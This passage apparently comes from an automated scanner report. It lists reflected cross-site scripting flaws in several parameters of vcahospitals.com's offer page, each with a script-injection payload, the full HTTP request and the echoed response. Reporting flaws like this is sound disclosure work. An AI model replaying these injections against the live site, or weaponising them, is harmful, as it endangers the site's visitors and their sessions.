Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=e5910"><script>alert(1)</script>83c5d7c83ea&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid
...[SNIP]...

2.65. http://www.vcahospitals.com/main/offer/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 541f7"><script>alert(1)</script>23387174e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?&state=FL&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F&541f7"><script>alert(1)</script>23387174e=1 HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:22 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14708

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
m action="http://www.vcahospitals.com/main/offer/thank-you.html?&state=FL&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F&541f7"><script>alert(1)</script>23387174e=1" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.66. http://www.vcahospitals.com/main/offer/ [newmex parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The value of the newmex request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb26a"><script>alert(1)</script>f4e1c6835ca was submitted in the newmex parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0bb26a"><script>alert(1)</script>f4e1c6835ca&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:17:11 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=km7obviolbecfv91k623peolv6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0bb26a"><script>alert(1)</script>f4e1c6835ca&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB19543
...[SNIP]...

2.67. http://www.vcahospitals.com/main/offer/ [optin parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The value of the optin request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e849"><script>alert(1)</script>730e752517f was submitted in the optin parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?&state=FL&optin=16e849"><script>alert(1)</script>730e752517f&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:04 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?&state=FL&optin=16e849"><script>alert(1)</script>730e752517f&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.68. http://www.vcahospitals.com/main/offer/ [other parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The value of the other request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91c04"><script>alert(1)</script>eabbcd649dd was submitted in the other parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=91c04"><script>alert(1)</script>eabbcd649dd&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:17:33 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=ug4maua9n8npvts3q702mnacq3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
/www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=91c04"><script>alert(1)</script>eabbcd649dd&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A
...[SNIP]...

2.69. http://www.vcahospitals.com/main/offer/ [petage parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The value of the petage request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79d43"><script>alert(1)</script>c56d9dd6dc2 was submitted in the petage parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=79d43"><script>alert(1)</script>c56d9dd6dc2&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:17:39 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=beecinp0q16pijh2d7fv3lo156; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
hospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=79d43"><script>alert(1)</script>c56d9dd6dc2&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-6606
...[SNIP]...

2.70. http://www.vcahospitals.com/main/offer/ [petname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The value of the petname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d62a5"><script>alert(1)</script>8bc90a2171d was submitted in the petname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=d62a5"><script>alert(1)</script>8bc90a2171d&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:17:44 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=t61kfqf8iod9f3ov4rimn1b057; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=d62a5"><script>alert(1)</script>8bc90a2171d&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%
...[SNIP]...

2.71. http://www.vcahospitals.com/main/offer/ [pettype parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The value of the pettype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6359"><script>alert(1)</script>440a5a05f49 was submitted in the pettype parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=c6359"><script>alert(1)</script>440a5a05f49&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7